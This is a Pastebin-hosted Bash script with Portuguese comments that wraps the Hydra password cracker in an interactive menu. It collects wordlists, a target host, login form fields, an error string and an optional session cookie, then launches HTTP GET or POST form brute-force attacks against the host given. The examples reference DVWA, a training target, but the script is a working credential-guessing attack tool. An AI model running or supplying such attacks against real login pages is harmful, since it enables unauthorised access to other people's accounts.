DarkProgrammer000

Hydra [Post & Get]

Oct 9th, 2019 (edited)
488
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2. # Obs: O GET Nao funciona em algumas paginas !!!
  3. ---------------------
  4. * DarkProgrammer000 *
  5. ---------------------
  6.  
  7. #################
  8. #### FUNCAO #####
  9. #################
  10.  
  11. informacao_GET()
  12. {
  13.     echo -e "\033[01;31m ---------------- EXEMPLO --------------- \033[00;37m"
  14.     echo -e "\033[01;32m - Wordlist [usuarios]: user              \033[00;37m"
  15.     echo -e "\033[01;33m - Wordlist [senhas]: pass                \033[00;37m"
  16.     echo -e "\033[01;34m - Host: www.exemplo.com                  \033[00;37m"
  17.     echo -e "\033[01;35m - Validacao: /dvwa/vulnerabilities/brute \033[00;37m"
  18.     echo -e "\033[01;36m - Campo [nome]: username                 \033[00;37m"
  19.     echo -e "\033[01;37m - Campo [senha]: password                \033[00;37m"
  20.     echo -e "\033[01;31m - Saida de erro: 'senha invalida'        \033[00;37m"
  21.     echo -e "\033[01;32m - Erro: 'senha invalida'                 \033[00;37m"
  22.     echo -e "\033[01;33m - Submit [url]: Login                    \033[00;37m"
  23.     echo -e "\033[01;30m ---------------------------------------- \033[00;37m"
  24. }
  25.  
  26. informacao_POST()
  27. {
  28.     echo -e "\033[01;31m -------------- EXEMPLO --------------- \033[00;37m"
  29.     echo -e "\033[01;32m Wordlist [usuarios]: user              \033[00;37m"
  30.     echo -e "\033[01;33m Wordlist [senhas]: pass                \033[00;37m"
  31.     echo -e "\033[01;34m Host: www.exemplo.com                  \033[00;37m"
  32.     echo -e "\033[01;35m Validacao: /dvwa/vulnerabilities/brute \033[00;37m"
  33.     echo -e "\033[01;36m Campo [nome]: username                 \033[00;37m"
  34.     echo -e "\033[01;37m Campo [senha]: password                \033[00;37m"
  35.     echo -e "\033[01;31m Saida de erro: 'senha invalida'        \033[00;37m"
  36.     echo -e "\033[01;32m Erro: 'senha invalida'                 \033[00;37m"
  37.     echo -e "\033[01;30m -------------------------------------- \033[00;37m"
  38. }
  39.  
  40. Formulario_Web_Padrao()
  41. {
  42.     echo ""
  43.     echo -e -n "\033[01;32m + Wordlist (usuarios): \033[00;37m"
  44.     read usuarios
  45.  
  46.     echo ""
  47.     echo -e -n "\033[01;33m + Wordlist (senhas): \033[00;37m"
  48.     read senhas
  49.  
  50.     echo ""
  51.     echo -e -n "\033[01;34m + Host (Ex: www.site.com): \033[00;37m"
  52.     read site
  53.  
  54.     echo ""
  55.     echo -e -n "\033[01;35m + Validacao (Ex: /admin/validar.php): \033[00;37m"
  56.     read validacao
  57.  
  58.     echo ""
  59.     echo -e -n "\033[01;31m + Campo login (Ex: usuario): \033[00;37m"
  60.     read user
  61.  
  62.     echo ""
  63.     echo -e -n "\033[01;32m + Campo senha (Ex: senha): \033[00;37m"
  64.     read pass
  65.  
  66.     echo ""
  67.     echo -e -n "\033[01;33m + Saida de erro (Ex: invalido): \033[00;37m"
  68.     read erro
  69.     echo ""
  70. }
  71.  
  72. Cookie_POST()
  73. {
  74.     echo ""
  75.     echo -e "\033[01;31m Informar Cookie: \033[00;37m"
  76.     echo -e "\033[01;32m [1] Sim \033[00;37m"
  77.     echo -e "\033[01;33m [2] Nao \033[00;37m"
  78.     echo ""
  79.     echo -e -n "\033[01;34m + Opc: \033[00;37m"
  80.     read resp
  81.  
  82.     # Estrutura em escolha    
  83.     case $resp in
  84.     1)
  85.         echo -e -n "\033[01;35m Cookie (Ex: Cookie: security=low; PHPSESSID=eh3utmffq3fuu0psbc1p24aah7): \033[00;37m"
  86.         read cookie
  87.            
  88.         # Hydra (com cookie)
  89.         hydra -L $usuarios -P $senhas $site $metodo "$validacao:$user=^USER^&$pass=^PASS^:F=$erro:H=$cookie" -V -t4
  90.         ;;    
  91.    
  92.     2)
  93.         # Hydra (sem cookie)
  94.         hydra -L $usuarios -P $senhas $site $metodo "$validacao:$user=^USER^&$pass=^PASS^:F=$erro" -V -t4
  95.         ;;
  96.    
  97.     *)
  98.         ;;
  99.  
  100.     esac
  101. }
  102.  
  103. Cookie_GET()
  104. {
  105.     echo -e -n "\033[01;31m Login (Ex: Analisar URL (...&Login=Login): \033[00;37m"
  106.     read login
  107.  
  108.     echo ""
  109.     echo -e "\033[01;31m Informar Cookie: \033[00;37m"
  110.     echo -e "\033[01;32m [1] Sim \033[00;37m"
  111.     echo -e "\033[01;33m [2] Nao \033[00;37m"
  112.     echo ""
  113.     echo -e -n "\033[01;34m + Opc: \033[00;37m"
  114.     read resp
  115.    
  116.     # Estrutura em escolha    
  117.     case $resp in
  118.     1)
  119.         echo -e -n "\033[01;35m Cookie: (Ex: Cookie: security=low; PHPSESSID=eh3utmffq3fuu0psbc1p24aah7): \033[00;37m"
  120.         read cookie
  121.        
  122.         # Hydra (com cookie)
  123.         hydra -L $usuarios -P $senhas $site $metodo "$validacao:$user=^USER^&$pass=^PASS^&$login=$login:F=$erro:H=$cookie" -V -t4;;
  124.    
  125.     2)
  126.         # Hydra (sem cookie)
  127.         hydra -L $usuarios -P $senhas $site $metodo "$validacao:$user=^USER^&$pass=^PASS^$login=$login:F=$erro" -V -t4;;
  128.    
  129.     esac
  130. }
  131.  
  132. ####################
  133. ##### PROGRAMA #####
  134. ####################
  135. clear
  136. echo -e "\033[01;33m ------------- \033[00;37m"
  137. echo -e "\033[01;33m     Hydra     \033[00;37m"
  138. echo -e "\033[01;33m ------------- \033[00;37m"
  139. echo ""
  140. echo -e "\033[01;32m [1] GET  \033[00;37m"
  141. echo -e "\033[01;34m [2] POST \033[00;37m"
  142. echo ""
  143. echo -e -n "\033[01;35m + Opc: \033[00;37m"
  144. read escolha
  145. echo ""
  146.  
  147. # Estrutura em escolha
  148. case $escolha in
  149.    
  150. 1)
  151.     # Metodo GET
  152.     metodo="http-get-form"
  153.  
  154.     # Chamada de funcao
  155.     informacao_GET
  156.     Formulario_Web_Padrao
  157.     Cookie_GET
  158.     ;;
  159.  
  160. 2)
  161.     # Metodo POST
  162.     metodo="http-post-form"
  163.  
  164.     # Chamada de funcao
  165.     informacao_POST
  166.     Formulario_Web_Padrao
  167.     Cookie_POST
  168.     ;;
  169.        
  170. *)
  171.     ;;
  172. esac
RAW Paste Data